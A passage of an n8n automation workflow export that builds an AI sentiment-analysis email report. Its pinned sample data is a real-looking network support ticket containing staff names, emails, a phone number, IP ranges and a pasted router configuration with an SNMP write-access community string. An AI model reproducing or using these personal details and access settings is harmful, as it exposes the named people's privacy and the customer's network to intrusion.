.info-table-Neutral {\n      background: #f4f7fb !important;\n      border-left: 6px solid #90a4ae !important;\n    }\n    .info-block {\n      min-width: 220px;\n      margin-bottom: 8px;\n      display: flex;\n      align-items: center;\n      font-size: 15px;\n    }\n    .info-label {\n      color: #1a237e;\n      font-weight: bold;\n      margin-right: 8px;\n      white-space: nowrap;\n      display: flex;\n      align-items: center;\n    }\n    .info-label img {\n      margin-right: 4px;\n      width: 18px;\n      height: 18px;\n    }\n    .info-value {\n      color: #222;\n      margin-left: 4px;\n    }\n    .section-title {\n      font-size: 18px;\n      color: #1a237e;\n      font-weight: bold;\n      margin: 32px 0 16px 48px;\n    }\n    .sentiment-block {\n      width: 92%;\n      margin: 0 auto 24px auto;\n      background: #f5f7fa;\n      border-left: 6px solid #90a4ae;\n      border-radius: 8px;\n      padding: 24px 32px;\n      box-shadow: 0 1px 4px #e3e7ee;\n    }\n    .sentiment-header {\n      display: flex;\n      align-items: center;\n      margin-bottom: 12px;\n    }\n    .sentiment-header img {\n      width: 28px;\n      height: 28px;\n      margin-right: 10px;\n    }\n    .sentiment-type {\n      font-size: 17px;\n      color: #607d8b;\n      font-weight: bold;\n    }\n    .sentiment-text {\n      font-size: 15px;\n      color: #2d3a4a;\n      margin-top: 10px;\n      margin-bottom: 0;\n    }\n    .footer {\n      text-align: center;\n      color: #b3b3b3;\n      font-size: 12px;\n      margin-top: 32px;\n      padding: 16px 0 0 0;\n    }\n    @media (max-width: 650px) {\n      .container { max-width: 98vw; }\n      .info-table, .sentiment-block { width: 98%; }\n      .header { flex-direction: column; gap: 8px; padding: 24px 8px 12px 8px; }\n      .section-title { margin-left: 12px; }\n    }\n  </style>\n</head>\n<body>\n  <div style=\"\n    width: 85vw;\n    max-width: 1200px;\n    min-width: 320px;\n    margin: 32px auto;\n    border-radius: 18px;\n    background: linear-gradient(90deg, #0033cc 0%, #ed1e79 100%);\n    padding: 1px;\n    box-sizing: border-box;\n  \">\n    <div class=\"container\" style=\"\n      background: #fff;\n      border-radius: 16px;\n      width: 100%;\n      box-sizing: border-box;\n      padding-bottom: 32px;\n    \">\n      <div class=\"header\">\n        <div class=\"logo-placeholder\">\n          <img src=\"https://raw.githubusercontent.com/adiazsifx/img_emails/main/logo_iafx_new.png\" alt=\"Logo IFX\" width=\"40\" height=\"40\" style=\"vertical-align:middle; border-radius:8px; background:#fff; box-shadow:0 1px 4px #e3e7ee;\">\n        </div>\n        <div>\n          <div class=\"header-title\">AIFXNetworks - Análisis de Sentimientos</div>\n          <div class=\"subtitle\">Reporte automático de análisis de sentimientos</div>\n        </div>\n      </div>\n      <div class=\"info-table info-table-{{ $('Merge_salida').item.json.sentimentAnalysis.category }} \">\n        <div class=\"info-block\">\n          <span class=\"info-label\"><img src=\"https://img.icons8.com/color/48/000000/user.png\">Nombre del Cliente:</span>\n          <span class=\"info-value\">{{ $('Merge_salida').item.json.customerId }}</span>\n        </div>\n        <div class=\"info-block\">\n          <span class=\"info-label\"><img src=\"https://img.icons8.com/color/48/000000/barcode.png\">Número de Caso:</span>\n          <span class=\"info-value\">{{ $('Merge_salida').item.json.ticketId }}</span>\n        </div>\n        <div class=\"info-block\">\n          <span class=\"info-label\"><img src=\"https://img.icons8.com/color/48/000000/topic.png\">Asunto del Caso:</span>\n          <span class=\"info-value\"><b>{{ $json.sentimentAnalysis.category }}</b></span>\n        </div>\n      </div>\n      <div class=\"section-title\">Resultado del Análisis de Sentimientos</div>\n      \n      <!-- Resumen -->\n      <div class=\"sentiment-block\">\n        <div class=\"sentiment-header\">\n          \n          <span class=\"sentiment-type\">Resumen del Análisis</span>\n        </div>\n        <div class=\"sentiment-text\">{{ $json.output.resumen }}</div>\n      </div>\n\n      <!-- Fragmento -->\n      <div class=\"sentiment-block info-table-{{ $('Merge_salida').item.json.sentimentAnalysis.category }}\">\n        <div class=\"sentiment-header\">\n          \n          <span class=\"sentiment-type\">Fragmento</span>\n        </div>\n        <div class=\"sentiment-text\">{{ $json.output.fragmento }}</div>\n      </div>\n\n            <!-- Recomendaciones -->\n      <div class=\"sentiment-block\">\n        <div class=\"sentiment-header\">\n         \n          <span class=\"sentiment-type\">Recomendaciones</span>\n        </div>\n        <div class=\"sentiment-text\">\n          <div style=\"margin: 0; padding-left: 20px;\">\n            • {{ $json.output.recomendaciones[0] }}<br><br>\n            • {{ $json.output.recomendaciones[1] }}<br><br>\n            • {{ $json.output.recomendaciones[2] }}\n          </div>\n        </div>\n      </div>\n      \n      <div class=\"footer\">\n        Sistema de Análisis de Sentimientos | © 2025 IFX<br>\n        Este reporte ha sido generado automáticamente.\n      </div>\n\n    </div>\n  </div>\n</body>\n</html>"},"type":"n8n-nodes-base.html","typeVersion":1.2,"position":[3320,-740],"id":"ed478c57-ee69-453b-8cb5-0d7663617a4d","name":"HTML1"},{"parameters":{"description":"Valida La respuesta siempre debe ser un json, la estructura del json es: \n  resumen:string\n  fragmento\":string\n  recomendaciones:array"},"type":"@n8n/n8n-nodes-langchain.toolThink","typeVersion":1,"position":[1320,580],"id":"8dfacbdd-aa33-4a93-b34c-f356a0d1b6da","name":"Think","alwaysOutputData":true},{"parameters":{"description":"Valida La respuesta siempre debe ser un json, la estructura del json es: \n  resumen:string\n  fragmento\":string\n  recomendaciones:array"},"type":"@n8n/n8n-nodes-langchain.toolThink","typeVersion":1,"position":[1320,1120],"id":"f4a551ac-cdff-4ec4-b133-fadaf4d247fa","name":"Think1","alwaysOutputData":true},{"parameters":{"assignments":{"assignments":[{"id":"1826b932-5d72-414d-a4c5-9bb71e9a1f63","name":"sentimentAnalysis","value":"={{ $json.sentimentAnalysis }}","type":"object"},{"id":"779e9857-33d0-4db9-9377-6a75da6782b0","name":"ticketId","value":"={{ $('Code').item.json.ticketId }}","type":"string"},{"id":"bea65672-506c-4916-a4b4-66895f6a8809","name":"Cliente","value":"={{ $('ValidoJson').item.json.info.customerName }}","type":"string"},{"id":"a777d42b-9fbf-49ee-baac-45ec92e41b6c","name":"customerId","value":"={{ $('ValidoJson').item.json.info.customerID }}","type":"string"},{"id":"0943427e-dd3c-48c6-ba92-ceb2c3ccfc71","name":"tipoCliente","value":"={{ $('ValidoJson').item.json.info.customerType }}","type":"string"}]},"options":{}},"type":"n8n-nodes-base.set","typeVersion":3.4,"position":[940,800],"id":"af9f0ca6-ace9-4931-a133-46e7347f3f2f","name":"Formateo de Campos2"},{"parameters":{"assignments":{"assignments":[{"id":"cbecb362-93e1-49c4-a6f9-16adf09f127c","name":"ticketId","value":"={{ $('Formateo de Campos').item.json.ticketId }}","type":"string"},{"id":"74e97578-bf99-4882-b023-922da8d6b4ba","name":"cliente","value":"={{ $('Formateo de Campos').item.json.Cliente }}","type":"string"},{"id":"2282db41-c4b3-4873-8886-5776483d0f30","name":"tipoCliente","value":"={{ $('Formateo de Campos').item.json.tipoCliente }}","type":"string"},{"id":"c4c1f076-0281-4f7c-8c18-d1d001d7ef86","name":"customerId","value":"={{ $('Formateo de Campos').item.json.customerId }}","type":"string"},{"id":"7137fb7e-e427-4341-8454-234b94024334","name":"sentimentAnalysis.category","value":"={{ $('Formateo de Campos').item.json.sentimentAnalysis.category }}","type":"string"},{"id":"9197bc61-a6ba-41c5-8b7f-5894dadd3441","name":"output","value":"={{ $json.output }}","type":"object"},{"id":"d6b6375b-a54b-4b90-9d48-12eaaeec2179","name":"sentimentAnalysis.strength","value":"={{ $('Sentiment Analysis').item.json.sentimentAnalysis.strength }}","type":"number"},{"id":"755c9bd0-09b5-482b-9e3e-c9face2e5d46","name":"sentimentAnalysis.confidence","value":"={{ $('Sentiment Analysis').item.json.sentimentAnalysis.confidence }}","type":"number"},{"id":"625ad804-8ed9-4233-ac8e-20b8e7d06b63","name":"info.startdate","value":"={{ $('ValidoJson').item.json.info.startdate }}","type":"string"}]},"options":{}},"type":"n8n-nodes-base.set","typeVersion":3.4,"position":[1620,800],"id":"373cfafc-df9f-481d-baa2-19f485bfde75","name":"Formato de Salida Endpoint_"},{"parameters":{"assignments":{"assignments":[{"id":"f331282d-3e11-4107-8018-c668b98d0317","name":"success","value":true,"type":"boolean"},{"id":"cbecb362-93e1-49c4-a6f9-16adf09f127c","name":"ticketId","value":"=","type":"string"},{"id":"74e97578-bf99-4882-b023-922da8d6b4ba","name":"body['datos del ticket'].Incidente.Cliente","value":"=","type":"string"},{"id":"c4c1f076-0281-4f7c-8c18-d1d001d7ef86","name":"customerId","value":"=","type":"string"},{"id":"7137fb7e-e427-4341-8454-234b94024334","name":"sentimentAnalysis.category","value":"=","type":"string"},{"id":"9197bc61-a6ba-41c5-8b7f-5894dadd3441","name":"output","value":"=** ERROR ** Json no valido !  {{ $json.message }}","type":"string"},{"id":"091a7ead-afc4-4c03-b1fd-eff7adc60770","name":"sentimentAnalysis.strength","value":"=","type":"number"},{"id":"13cfb142-fb3e-4c43-a406-ccd12873bd6f","name":"sentimentAnalysis.confidence","value":"=","type":"number"}]},"options":{}},"type":"n8n-nodes-base.set","typeVersion":3.4,"position":[3360,-180],"id":"5bc1844b-9ce0-4e05-9c7f-33c66ee806b6","name":"OutputNeutral"},{"parameters":{"assignments":{"assignments":[{"id":"f331282d-3e11-4107-8018-c668b98d0317","name":"success","value":true,"type":"boolean"},{"id":"cbecb362-93e1-49c4-a6f9-16adf09f127c","name":"ticketId","value":"={{ $json.caseid }}","type":"string"},{"id":"74e97578-bf99-4882-b023-922da8d6b4ba","name":"cliente","value":"={{ $json.customer }}","type":"string"},{"id":"c4c1f076-0281-4f7c-8c18-d1d001d7ef86","name":"customerId","value":"={{ $json.cid }}","type":"string"},{"id":"7137fb7e-e427-4341-8454-234b94024334","name":"sentimentAnalysis.category","value":"={{ $json.sentiment }}","type":"string"},{"id":"9197bc61-a6ba-41c5-8b7f-5894dadd3441","name":"output","value":"=** Caso validado anteriormente *** ! ","type":"string"},{"id":"091a7ead-afc4-4c03-b1fd-eff7adc60770","name":"sentimentAnalysis.strength","value":"={{ $json.strength }}","type":"number"},{"id":"13cfb142-fb3e-4c43-a406-ccd12873bd6f","name":"sentimentAnalysis.confidence","value":"={{ $json.confidence }}","type":"number"}]},"options":{}},"type":"n8n-nodes-base.set","typeVersion":3.4,"position":[2180,-740],"id":"5d5f0f10-7a71-4f23-ac0f-a7390c856e9f","name":"OutputNeutral1"},{"parameters":{"schema":{"__rl":true,"value":"public","mode":"list","cachedResultName":"public"},"table":{"__rl":true,"value":"sentiment_results","mode":"list","cachedResultName":"sentiment_results"},"columns":{"mappingMode":"defineBelow","value":{"strength":"={{ $json.sentimentAnalysis.strength }}","confidence":"={{ $json.sentimentAnalysis.confidence }}","caseid":"={{ $('ValidoJson').item.json.info.casenumber }}","customer":"={{ $('ValidoJson').item.json.info.customerName }}","cid":"={{ $('ValidoJson').item.json.info.customerID }}","sentiment":"={{ $json.sentimentAnalysis.category }}","analisis":"=\"\""},"matchingColumns":["id"],"schema":[{"id":"id","displayName":"id","required":false,"defaultMatch":true,"display":true,"type":"number","canBeUsedToMatch":true,"removed":true},{"id":"created_at","displayName":"created_at","required":false,"defaultMatch":false,"display":true,"type":"dateTime","canBeUsedToMatch":true,"removed":true},{"id":"cid","displayName":"cid","required":false,"defaultMatch":false,"display":true,"type":"number","canBeUsedToMatch":true},{"id":"customer","displayName":"customer","required":false,"defaultMatch":false,"display":true,"type":"string","canBeUsedToMatch":true},{"id":"caseid","displayName":"caseid","required":false,"defaultMatch":false,"display":true,"type":"string","canBeUsedToMatch":true},{"id":"sentiment","displayName":"sentiment","required":false,"defaultMatch":false,"display":true,"type":"string","canBeUsedToMatch":true},{"id":"strength","displayName":"strength","required":false,"defaultMatch":false,"display":true,"type":"number","canBeUsedToMatch":true},{"id":"confidence","displayName":"confidence","required":false,"defaultMatch":false,"display":true,"type":"number","canBeUsedToMatch":true},{"id":"json_data","displayName":"json_data","required":false,"defaultMatch":false,"display":true,"type":"object","canBeUsedToMatch":true,"removed":true},{"id":"analisis","displayName":"analisis","required":false,"defaultMatch":false,"display":true,"type":"string","canBeUsedToMatch":true}],"attemptToConvertTypes":false,"convertFieldsToString":false},"options":{}},"type":"n8n-nodes-base.postgres","typeVersion":2.6,"position":[1820,-340],"id":"a1678858-bcf7-4658-b4aa-c87fb1bc3be0","name":"Postgres1","credentials":{"postgres":{"id":"PrpJ8WzpiFemwSbR","name":"AnalisisSentimiento"}}}],"connections":{"Webhook":{"main":[[{"node":"ValidoJson","type":"main","index":0}]]},"Code":{"main":[[{"node":"busca_tt","type":"main","index":0}]]},"OpenAI Chat Model":{"ai_languageModel":[[{"node":"Sentiment Analysis","type":"ai_languageModel","index":0}]]},"Sentiment Analysis":{"main":[[{"node":"Formateo de Campos","type":"main","index":0}],[{"node":"Postgres1","type":"main","index":0}],[{"node":"Formateo de Campos2","type":"main","index":0}]]},"AI Agent":{"main":[[{"node":"Formato de Salida Endpoint_2","type":"main","index":0}]]},"Formateo de Campos":{"main":[[{"node":"AI Agent","type":"main","index":0}]]},"OpenAI Chat Model2":{"ai_languageModel":[[{"node":"AI Agent1","type":"ai_languageModel","index":0}]]},"AI Agent1":{"main":[[{"node":"Formato de Salida Endpoint_","type":"main","index":0}]]},"Formato de Salida Endpoint_2":{"main":[[{"node":"Merge","type":"main","index":0}]]},"Merge":{"main":[[{"node":"ConverToIntegerCID","type":"main","index":0}]]},"ConverToIntegerCID":{"main":[[{"node":"Postgres","type":"main","index":0}]]},"busca_tt":{"main":[[{"node":"If","type":"main","index":0}]]},"If":{"main":[[{"node":"OutputNeutral1","type":"main","index":0}],[{"node":"Sentiment Analysis","type":"main","index":0}]]},"Postgres":{"main":[[{"node":"Formato de Salida Bd1","type":"main","index":0}]]},"ValidoJson":{"main":[[{"node":"If1","type":"main","index":0}],[{"node":"ErrorJsonNoValido1","type":"main","index":0}]]},"If1":{"main":[[{"node":"Code","type":"main","index":0}],[{"node":"ErrorJsonOutput","type":"main","index":0}]]},"OpenAI Chat Model3":{"ai_languageModel":[[{"node":"AI Agent","type":"ai_languageModel","index":0}]]},"Switch":{"main":[[{"node":"HTML1","type":"main","index":0}],[{"node":"OutputNeutral","type":"main","index":0}],[{"node":"HTML1","type":"main","index":0}],[{"node":"ErrorJsonNoValido","type":"main","index":0}]]},"Formato de Salida Bd1":{"main":[[{"node":"Merge_salida","type":"main","index":1}]]},"Merge_salida":{"main":[[{"node":"Switch","type":"main","index":0}]]},"Email Neutro":{"main":[[{"node":"Formato de Salida Bd2","type":"main","index":0}],[{"node":"Salida Error","type":"main","index":0}]]},"Structured Output Parser":{"ai_outputParser":[[{"node":"AI Agent1","type":"ai_outputParser","index":0}]]},"Structured Output Parser1":{"ai_outputParser":[[{"node":"AI Agent","type":"ai_outputParser","index":0}]]},"HTML1":{"main":[[{"node":"Email Neutro","type":"main","index":0}]]},"Think":{"ai_tool":[[{"node":"AI Agent","type":"ai_tool","index":0}]]},"Think1":{"ai_tool":[[{"node":"AI Agent1","type":"ai_tool","index":0}]]},"Formateo de Campos2":{"main":[[{"node":"AI Agent1","type":"main","index":0}]]},"Formato de Salida Endpoint_":{"main":[[{"node":"Merge","type":"main","index":1}]]}},"settings":{"executionOrder":"v1","callerPolicy":"workflowsFromSameOwner","timeSavedPerExecution":5},"staticData":null,"meta":{"templateCredsSetupCompleted":true},"pinData":{"Webhook":[{"json":{"headers":{"host":"n8n.aifx.com.co","x-real-ip":"200.62.6.89","x-forwarded-for":"200.62.6.89","x-forwarded-proto":"https","connection":"upgrade","content-length":"25232","x-correlation-id":"7d53df60-4869-11f0-a506-0affccd37bb9","user-agent":"AHC/1.0","accept":"*/*","content-type":"application/json; charset=UTF-8"},"params":{},"query":{},"body":{"info":{"id":"37911967","title":"Segmento local no alcanza servidores en IFX","casenumber":"TT1069193","customerID":"1490339","customerName":"COSMITET LTDA CORPORACION DE SERVICIOS MEDICOS INTERNACIONALES THEM Y CIA L","customerType":"Titanium","assigned":{"id":"2889922","value":"Conectividad_Titanium_Platinum"},"startdate":"06/12/2025 8:50 AM","enddate":"06/13/2025 9:58 AM","phonealt":"(322) 499-3538","type":{"id":"1","value":"Incidencia"},"type_event":{"id":"","value":""},"creator":{"id":"-6","value":"ANONYMOUS CUSTOMER"},"category":{"id":"259","value":"Problemas para alcanzar destino"},"services":{"id":"1284198","value":"1387993-IFX Data Transport"},"status":{"id":"7","value":"Cerrado"}},"messages":[{"id":"153597254","author":{"id":"2703826","value":"Nixon Trujillo"},"authoremail":"ntrujillo@bluedataservice.com","date":"06/13/2025 11:17 AM","datesecs":1749838620000,"message":"Cordial saludo. Se realizan validaciones y aun no se alcanzan servidores en la sub red 10.30.0.0/24 desde el segmento 10.100.40.0/23 adjunto evidenciaY después del cambio que realizaron ya no me funciona la comunicacion desde el segmento 10.100.24.0/24 Prueba ayerprueba hoyEl jue, 12 jun 2025 a las 9:40, MIGUEL ANGEL AMEZQUITA HERNANDEZ (&lt;maamezquita@ifxcorp.com&gt;) escribió:   Novedades   Caso TT1069193 : Cordial saludoEstimado Nixon Se realizan ajustes sobre las rutas y se agrega red a las rutas, su ayuda validando y confirmando. atento a sus comentarios         MIGUEL ANGEL AMEZQUITA HERNANDEZ    maamezquita@ifxcorp.com     Cordial saludo.   En la sede Cosmitet Rey David Cali tenemos un canal de datos hacia IFX pero actualmente el segmento 10.100.40.0/23 no está alcanzando el segmento 10.30.0.0/24, los demás segmentos si lo alcanzan de forma correcta. Tracert  de un segmento que sí funciona **************************** AVISO LEGAL ************************************************* Este correo electrónico está dirigido exclusivamente al destinatario y puede contener información confidencial o privilegiada de BLUE DATA S.A.S. Si usted no es el destinatario previsto, se le informa que cualquier uso, divulgación o copia no autorizada de su contenido está estrictamente prohibida conforme a la legislación vigente. Si ha recibido este mensaje por error, le solicitamos notificarlo de inmediato a través de esta misma vía al correo bluedatasas@gmail.com  y proceder a eliminarlo de forma definitiva   **************************** AVISO DE PRIVACIDAD *********************************************** El presente Aviso de Privacidad (en adelante el “Aviso”) establece los términos y condiciones en virtud de los cuales BLUE DATA S.A.S., identificado con NIT 901.740.990-1   y con domicilio CL 8 34 54, realizará el tratamiento de sus datos personales.   Dando cumplimiento a lo dispuesto en la Ley 1581 de 2012, el Decreto Reglamentario 1377 de 2013 y con base a nuestra Política de Protección de Datos Personales que se ha entregado de manera física y publicada en la oficina en la CL 8 34 54,  BLUE DATA S.A.S. reconoce su obligación como responsable por el tratamiento de los datos de clientes, proveedores, contratistas, accionistas entre otros conforme a las relaciones contractuales, comerciales, legales, entre otros con base a las finalidades de la información. De conformidad con lo anterior, solicitamos el otorgamiento de su autorización para seguir tratando sus datos personales. Para el efecto, requerimos nos envíe la correspondiente autorización al correo bluedatasas@gmail.com , indicando con ello que permite el uso de sus datos personales de acuerdo a lo prescrito por las leyes pertinentes. ***** Aviso de Confidencialidad ***** Este mensaje, (incluyendo cualquier anexo) está dirigido únicamente a los destinatarios arriba señalados. Puede contener información confidencial o privilegiada y no debe ser leído, copiado o de otra forma utilizado por cualquier otra persona. Si usted recibe esta comunicación por error, favor avisar al remitente y eliminar el mensaje de su sistema. ***** Disclaimer ***** This email (including any attachments) is intended only for the recipient(s) named above. It may contain confidencial or privileged information and should not be read, copied or otherwise used by any other person. If you are not a recipient, please contact the sender and delete the email from your system. **************************** AVISO LEGAL *************************************************Este correo electrónico está dirigido exclusivamente al destinatario y puede contener información confidencial o privilegiada de BLUE DATA S.A.S. Si usted no es el destinatario previsto, se le informa que cualquier uso, divulgación o copia no autorizada de su contenido está estrictamente prohibida conforme a la legislación vigente. Si ha recibido este mensaje por error, le solicitamos notificarlo de inmediato a través de esta misma vía al correo bluedatasas@gmail.com  y proceder a eliminarlo de forma definitiva **************************** AVISO DE PRIVACIDAD ***********************************************El presente Aviso de Privacidad (en adelante el “Aviso”) establece los términos y condiciones en virtud de los cuales BLUE DATA S.A.S., identificado con NIT 901.740.990-1   y con domicilio CL 8 34 54, realizará el tratamiento de sus datos personales. Dando cumplimiento a lo dispuesto en la Ley 1581 de 2012, el Decreto Reglamentario 1377 de 2013 y con base a nuestra Política de Protección de Datos Personales que se ha entregado de manera física y publicada en la oficina en la CL 8 34 54,  BLUE DATA S.A.S. reconoce su obligación como responsable por el tratamiento de los datos de clientes, proveedores, contratistas, accionistas entre otros conforme a las relaciones contractuales, comerciales, legales, entre otros con base a las finalidades de la información. De conformidad con lo anterior, solicitamos el otorgamiento de su autorización para seguir tratando sus datos personales. Para el efecto, requerimos nos envíe la correspondiente autorización al correo bluedatasas@gmail.com , indicando con ello que permite el uso de sus datos personales de acuerdo a lo prescrito por las leyes pertinentes.","attachment":{}},{"id":"153587182","author":{"id":"652254","value":"SOPORTE  TECNICO EXT"},"authoremail":"care@ifxcorp.com","date":"06/13/2025 7:58 AM","datesecs":1749826680000,"message":" Apreciado cliente COSMITET LTDA CORPORACION DE SERVICIOS MEDICOS INTERNACIONALES THEM Y CIA LEl caso TT1069193 cambió a estado Pendiente confirmar cierre.Si autoriza el cierre de manera inmediata por favor dar Clic AquíSi presenta alguna novedad para el equipo Care y desea que retomen la gestión del caso dar Mantener Caso​Si desea mantener el caso abierto para su revisión y recibir este recordatorio en 24 horas dar Clic AquíNota: En caso de no elegir ninguna de las opciones, el sistema lo cerrará de manera automática en la próximas 12hrs ","attachment":{}},{"id":"153594204","author":{"id":"652254","value":"SOPORTE  TECNICO EXT"},"authoremail":"care@ifxcorp.com","date":"06/13/2025 9:58 AM","datesecs":1749833880000,"message":" INFORME DE CASO --> Número de Caso TT1069193 customer {customer.id} caseid {id} --> Fecha y Hora de Apertura del Caso 12/06/2025 7:50 AM Fecha y Hora de Operabilidad de los Servicios 06/12/2025 09:40 Servicios Asociados 1387993-IFX Data Transport Descripción del Caso En la sede Cosmitet Rey David Cali tenemos un canal de datos hacia IFX pero actualmente el segmento 10.100.40.0/23 no está alcanzando el segmento 10.30.0.0/24, los demás segmentos si lo alcanzan de forma correcta. Acciones realizadas Se realizan ajustes sobre las rutas y se agrega red a las rutas, su ayuda validando y confirmando. atento a sus comentarios Imputabilidad Cliente Persona que Autoriza la Operabilidad y Cierre del Caso pte cliente - cierre 24 horas ¿CUÁL FUE TU EXPERIENCIA CON EL CASO TT1069193 ?Esta encuesta te tomará un minuto y nos ayudará a prestarte un mejor servicio ¿CUÁL FUE TU EXPERIENCIA CON EL CASO TT1069193 ? Esta encuesta te tomará un minuto y nos ayudará a prestarte un mejor servicio --> --> ","attachment":{}},{"id":"153527912","author":{"id":"2703828","value":"Nixon Trujillo"},"authoremail":"ntrujillo@bluedataservice.com","date":"06/12/2025 8:50 AM","datesecs":1749743400000,"message":" Cordial saludo. En la sede Cosmitet Rey David Cali tenemos un canal de datos hacia IFX pero actualmente el segmento 10.100.40.0/23 no está alcanzando el segmento 10.30.0.0/24, los demás segmentos si lo alcanzan de forma correcta. Tracert de un segmento que sí funciona **************************** AVISO LEGAL ************************************************* Este correo electrónico está dirigido exclusivamente al destinatario y puede contener información confidencial o privilegiada de BLUE DATA S.A.S. Si usted no es el destinatario previsto, se le informa que cualquier uso, divulgación o copia no autorizada de su contenido está estrictamente prohibida conforme a la legislación vigente. Si ha recibido este mensaje por error, le solicitamos notificarlo de inmediato a través de esta misma vía al correo bluedatasas@gmail.com y proceder a eliminarlo de forma definitiva **************************** AVISO DE PRIVACIDAD *********************************************** El presente Aviso de Privacidad (en adelante el “Aviso”) establece los términos y condiciones en virtud de los cuales BLUE DATA S.A.S., identificado con NIT 901.740.990-1 y con domicilio CL 8 34 54, realizará el tratamiento de sus datos personales. Dando cumplimiento a lo dispuesto en la Ley 1581 de 2012, el Decreto Reglamentario 1377 de 2013 y con base a nuestra Política de Protección de Datos Personales que se ha entregado de manera física y publicada en la oficina en la CL 8 34 54, BLUE DATA S.A.S. reconoce su obligación como responsable por el tratamiento de los datos de clientes, proveedores, contratistas, accionistas entre otros conforme a las relaciones contractuales, comerciales, legales, entre otros con base a las finalidades de la información. De conformidad con lo anterior, solicitamos el otorgamiento de su autorización para seguir tratando sus datos personales. Para el efecto, requerimos nos envíe la correspondiente autorización al correo bluedatasas@gmail.com , indicando con ello que permite el uso de sus datos personales de acuerdo a lo prescrito por las leyes pertinentes. ***** Aviso de Confidencialidad ***** Este mensaje, (incluyendo cualquier anexo) está dirigido únicamente a los destinatarios arriba señalados. Puede contener información confidencial o privilegiada y no debe ser leído, copiado o de otra forma utilizado por cualquier otra persona. Si usted recibe esta comunicación por error, favor avisar al remitente y eliminar el mensaje de su sistema. ***** Disclaimer ***** This email (including any attachments) is intended only for the recipient(s) named above. It may contain confidencial or privileged information and should not be read, copied or otherwise used by any other person. If you are not a recipient, please contact the sender and delete the email from your system. ","attachment":{}},{"id":"153527914","author":{"id":"652254","value":"SOPORTE  TECNICO EXT"},"authoremail":"care@ifxcorp.com","date":"06/12/2025 8:50 AM","datesecs":1749743400000,"message":" INFORME DE TICKET Asunto Nuevo Caso TT1069193 - COSMITET LTDA CORPORACION DE SERVICIOS MEDICOS INTERNACIONALES THEM Y CIA L : COMERCIALIZADORA DUARQUINT S.A.S Asunto del Ticket Segmento local no alcanza servidores en IFX N&uacute;mero de Ticket TT1069193 Fecha y Hora de Creaci&oacute;n del Ticket 06/12/2025 8:50 am Tipo del Caso Solicitud Estado Abierto Categoría ","attachment":{}},{"id":"153537260","author":{"id":"3369418","value":"MIGUEL ANGEL AMEZQUITA HERNANDEZ"},"authoremail":"maamezquita@ifxcorp.com","date":"06/12/2025 10:40 AM","datesecs":1749750000000,"message":" Novedades Caso TT1069193 : Cordial saludoEstimado Nixon Se realizan ajustes sobre las rutas y se agrega red a las rutas, su ayuda validando y confirmando. atento a sus comentarios   MIGUEL ANGEL AMEZQUITA HERNANDEZ maamezquita@ifxcorp.com Cordial saludo. En la sede Cosmitet Rey David Cali tenemos un canal de datos hacia IFX pero actualmente el segmento 10.100.40.0/23 no está alcanzando el segmento 10.30.0.0/24, los demás segmentos si lo alcanzan de forma correcta. Tracert de un segmento que sí funciona **************************** AVISO LEGAL ************************************************* Este correo electrónico está dirigido exclusivamente al destinatario y puede contener información confidencial o privilegiada de BLUE DATA S.A.S. Si usted no es el destinatario previsto, se le informa que cualquier uso, divulgación o copia no autorizada de su contenido está estrictamente prohibida conforme a la legislación vigente. Si ha recibido este mensaje por error, le solicitamos notificarlo de inmediato a través de esta misma vía al correo bluedatasas@gmail.com y proceder a eliminarlo de forma definitiva **************************** AVISO DE PRIVACIDAD *********************************************** El presente Aviso de Privacidad (en adelante el “Aviso”) establece los términos y condiciones en virtud de los cuales BLUE DATA S.A.S., identificado con NIT 901.740.990-1 y con domicilio CL 8 34 54, realizará el tratamiento de sus datos personales. Dando cumplimiento a lo dispuesto en la Ley 1581 de 2012, el Decreto Reglamentario 1377 de 2013 y con base a nuestra Política de Protección de Datos Personales que se ha entregado de manera física y publicada en la oficina en la CL 8 34 54, BLUE DATA S.A.S. reconoce su obligación como responsable por el tratamiento de los datos de clientes, proveedores, contratistas, accionistas entre otros conforme a las relaciones contractuales, comerciales, legales, entre otros con base a las finalidades de la información. De conformidad con lo anterior, solicitamos el otorgamiento de su autorización para seguir tratando sus datos personales. Para el efecto, requerimos nos envíe la correspondiente autorización al correo bluedatasas@gmail.com , indicando con ello que permite el uso de sus datos personales de acuerdo a lo prescrito por las leyes pertinentes. ***** Aviso de Confidencialidad ***** Este mensaje, (incluyendo cualquier anexo) está dirigido únicamente a los destinatarios arriba señalados. Puede contener información confidencial o privilegiada y no debe ser leído, copiado o de otra forma utilizado por cualquier otra persona. Si usted recibe esta comunicación por error, favor avisar al remitente y eliminar el mensaje de su sistema. ***** Disclaimer ***** This email (including any attachments) is intended only for the recipient(s) named above. It may contain confidencial or privileged information and should not be read, copied or otherwise used by any other person. If you are not a recipient, please contact the sender and delete the email from your system. ","attachment":{}},{"id":"153536432","author":{"id":"3369418","value":"MIGUEL ANGEL AMEZQUITA HERNANDEZ"},"authoremail":"care@ifxcorp.com","date":"06/12/2025 10:33 AM","datesecs":1749749580000,"message":"# feb/21/1974 23:48:05 by RouterOS 6.44.6# software id = BW3G-LUMT## model = RB750Gr3# serial number = C55D0BCB851A/interface bridgeadd name=\"loopback Monitoreo\"/interface vlanadd interface=ether1 name=Vlan3020_MPLS_DUMIAN vlan-id=3020add interface=ether1 name=Vlan3693_MPLS_BACKUP vlan-id=3693add interface=ether3 name=WAN_IMAGEN vlan-id=2755add interface=ether2 name=vlan10_GESTION_SWITCH vlan-id=10add interface=ether2 name=vlan100_LAN_MPLS vlan-id=100/interface vrrpadd interface=vlan100_LAN_MPLS name=vrrp1 priority=90/interface wireless security-profilesset [ find default=yes ] supplicant-identity=MikroTik/ip hotspot profileset [ find default=yes ] html-directory=flash/hotspot/routing bgp instanceset default as=64751 redistribute-connected=yes redistribute-static=yesadd as=64751 name=BGP_MPLS redistribute-connected=yes redistribute-static=yes router-id=1.1.1.1 routing-table=cloud/snmp communityadd addresses=190.61.4.34/32,190.61.4.170/32,190.61.4.35/32 name=ifxcliente write-access=yes/ip addressadd address=10.10.10.3/29 interface=vlan10_GESTION_SWITCH network=10.10.10.0add address=10.241.50.3/29 interface=vlan100_LAN_MPLS network=10.241.50.0add address=10.241.50.4/29 interface=vrrp1 network=10.241.50.0add address=172.17.58.42/30 interface=Vlan3693_MPLS_BACKUP network=172.17.58.40add address=10.241.51.2/29 interface=ether4 network=10.241.51.0add address=172.17.58.38/30 interface=ether3 network=172.17.58.36add address=10.24.0.1/29 interface=ether5 network=10.24.0.0add address=10.110.8.133 interface=\"loopback Monitoreo\" network=10.110.8.133add address=10.100.40.50 comment=PRUEBA_LOOPBACK interface=\"loopback Monitoreo\" network=10.100.40.50/ip dnsset servers=200.91.200.100,200.91.200.101/ip routeadd distance=1 